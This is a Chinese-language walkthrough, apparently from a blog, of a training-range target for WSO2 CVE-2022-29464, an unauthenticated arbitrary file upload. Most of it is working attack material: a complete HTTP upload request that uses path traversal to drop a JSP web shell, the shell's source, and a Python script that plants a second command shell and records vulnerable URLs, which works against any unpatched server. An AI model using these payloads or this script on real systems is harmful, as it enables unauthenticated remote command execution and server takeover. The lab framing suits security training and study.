靶标介绍
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
开启靶场
先到国家信息安全漏洞库查看一下这个漏洞的相关信息
利用这个漏洞的 POC 去抓包改包放包
方法 1: 上传 POC
首先在登录页面抓包,不需要登录,刷新登录页面就ok
然后发送到 repeater 改包,下面是 POC:
注意:Host 和 Accept 这两个参数要使用自己抓包抓到的数据,其他全都改成下面的内容
POST /fileupload/toolsAny HTTP/2
Host: eci-2ze71t1i6erojrrpmdbt.cloudeci1.ichunqiu.com:9443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Length: 894
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--/fileupload/toolsany是一个文件上传接口,content-type指定为multipart/form-data并在请求体中填入想要上传的文件内容。文件名指定为name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp",文件内容为:构造一个表单,文本框用于输入要执行的命令,然后提交。JSP代码用于获取命令内容,构造runtime.getRuntime()命令执行器,传入命令,读取命令执行结果并显示在页面上。
改完之后发包,如图所示,响应包出现那串数字表示成功了
上传成功后,拼接访问,即可执行一步命令。
https://eci-2ze71t1i6erojrrpmdbt.cloudeci1.ichunqiu.com:9443/authenticationendpoint/testshell.jsp
在这个搜索框输入下面的命令就可以查到 flag 了
cat /flag
方法 2:python 脚本
把下面的 python 脚本代码放在一个 python 文件,重命名为:CVE-2022-29464.py
# -*-coding:GBK -*-
import requests
shell= '''<%@ page import="java.util.*,java.io.*"%>
<html>
<body>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null ) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Runtime rt = Runtime.getRuntime();
Process p = rt.exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</body>
</html>'''
public_key = '''KEY'''
def CVE_2022_29464_exp(url):
try:
resp = requests.post(f"{url}/fileupload/toolsAny", timeout=3, verify=False, files={"../../../../repository/deployment/server/webapps/authenticationendpoint/capoeira": public_key})
resp = requests.post(f"{url}/fileupload/toolsAny", timeout=3, verify=False, files={"../../../../repository/deployment/server/webapps/authenticationendpoint/capoeira.jsp": shell})
if resp.status_code == 200 and len(resp.content) > 0 and 'java' not in resp.text:
print(f"【!!!!!!】存在CVE_2022_29464漏洞,shell地址为:{url}/authenticationendpoint/capoeira.jsp\n")
with open("存在WSO2远程命令执行漏洞的url.txt","a+") as f:
f.write(url + "/authenticationendpoint/capoeira.jsp\n")
f.close()
else:
print("【×】不存在CVE_2022_29464漏洞:" + url + "\n")
except Exception as e:
pass
if __name__ == "__main__":
url = "http://eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9445/"
CVE_2022_29464_exp(url)在存放CVE-2022-29464.py 这个脚本文件的目录下运行此文件
访问 shell 地址
http://eci-2zef9eei4moww5lp0kk6.cloudeci1.ichunqiu.com:9445//authenticationendpoint/capoeira.jsp
1482
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
